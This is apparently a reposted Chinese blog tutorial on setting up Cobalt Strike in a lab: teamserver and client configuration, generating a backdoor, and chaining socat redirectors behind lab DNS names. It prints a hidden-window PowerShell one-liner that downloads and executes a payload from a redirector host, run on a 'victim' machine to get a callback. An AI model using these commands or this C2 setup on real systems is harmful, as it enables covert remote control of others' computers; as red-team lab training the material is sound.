Cobalt Strike的使用(一)

admin 2023年7月31日08:14:55评论52 views字数 2451阅读8分10秒阅读模式

一、配置与基本操作

CobaltStrike简介

Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。

Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

服务端与客户端的配置

首先将下载好的CS文件解压至linux系统(此处我以kali linux为例), 切换至CS文件夹目录打开终端, 输出如下命令用于搭建CS服务器

./teamserver 192.168.47.134 qq123456

命令格式: teamserver <服务端ip地址> <CS服务端密码>

CS服务端的监听端口默认为50050, 若想更改监听端口可通过修改teamserver文件

切换至Windows虚拟机点击start.bat文件运行CS客户端界面, 并且输入: CS的服务器IP(192.168.47.134)、监听端口(50050)、自定义用户名、CS服务端密码(qq123456), 随后出现CS客户端界面

基本操作

首先新建个监听器, 设置监听的端口和payload, 此处payload我选择Beacon HTTP

选择相应的监听来创建后门程序, 此处创建的是一个可执行程序后门

将生成的后门程序放入受害机中并运行, 随后受害机会在CS客户端显示上线

二、重定向服务

重定向服务的概念

"重定向"是一个在CS服务器与目标主机进行网络传输之间的服务器, 不仅能保护CS服务器, 还能增强与目标网络传输的稳定性, 例如某一台重定向服务器倒塌了, 但是CS服务器还是能通过其他重定向服务器与目标网络进行信息传输

环境拓扑

  • 域名: team.com

  • Dns服务器: 192.168.47.137

  • CS团队服务器: 192.168.47.134(cs.team.com)

  • 重定向服务器1: 192.168.47.131(proxy1.team.com)

  • 重定向服务器2: 192.168.47.140(proxy2.team.com)

  • 目标主机: 192.168.47.141

Cobalt Strike的使用(一)

环境搭建

1.在域控为CS服务器及代理服务器配置域名

在域控服务器打开DNS管理器

Cobalt Strike的使用(一)

在DNS的正向查找区域新建一个区域, 名为team.com, 即相当于申请一个顶级域名

![动画](Cobalt Strike的使用/动画-16646107621791.gif)

为新建的区域增添A记录, 如下图所示步骤依次添加CS服务器及代理服务器

  • CS服务器: 别名为team, ip地址为192.168.47.134

  • 代理服务器1: 别名为proxy1, ip地址为192.168.47.131

  • 代理服务器2: 别名为proxy2, ip地址为192.168.47.140

Cobalt Strike的使用(一) Cobalt Strike的使用(一)2.将代理服务器80端口的数据转发到CS服务器80端口上

使用socat命令进行端口转发, 若没有此命令需先使用apt-get install -y socat命令进行安装, socat命令使用语法如下:

socat TCP4-LISTEN:80,fork TCP4:[server ip]:80

将本机80端口监听到的数据转发到server服务器上的80端口

在两台代理服务器(ubuntu0和ubuntu1)上输入: socat TCP4-LISTEN:80,fork TCP4:192.168.47.134:80

![动画](Cobalt Strike的使用/动画-16646283744081.gif)

攻击步骤

1.在CS客户端创建监听并生成攻击payload

在域内windows7主机登录CS客户端

Cobalt Strike的使用(一)

新建http监听80端口, 将代理的服务器域名填写至HTTP Hosts

Cobalt Strike的使用(一)

生成Power Shell远程执行代码: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://proxy1.team.com:80/a'))"

![动画](Cobalt Strike的使用/动画-16646361660073.gif)


浏览器访问http://proxy1.team.com:80/ahttp://proxy2.team.com:80/a, 查看是否有返回结果, 若有则表示攻击payload配置成功

![image-20221001230039340](Cobalt Strike的使用/image-20221001230039340.png)

通过查看web日志可以查询到访问域名者的详细信息

![image-20221001230512699](Cobalt Strike的使用/image-20221001230512699.png)

2.受害机执行PowerShell恶意代码

在受害机执行powershell恶意代码: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://proxy1.team.com:80/a'))"后, 受害机在CS客户端界面显示上线

Cobalt Strike的使用(一)

受害机抓包分析

使用Wireshark抓取HTTP数据包进行分析, 受害机的ip地址为192.168.47.141, 它向192.168.47.140(proxy2.team.com)发http数据包, 随后192.168.47.140192.168.47.134(cs.team.com)发http数据包, 除此之外受害机还向192.168.47.131(proxy1.team.com)发了http数据包



关 注 有 礼



欢迎关注公众号:网络安全者

Cobalt Strike的使用(一)

1、送书规则
2、今日送书《Web渗透测试技术》

Cobalt Strike的使用(一)

本文内容来自网络,如有侵权请联系删除

原文始发于微信公众号(网络安全者):Cobalt Strike的使用(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月31日08:14:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cobalt Strike的使用(一)http://cn-sec.com/archives/1918457.html

发表评论

匿名网友 填写信息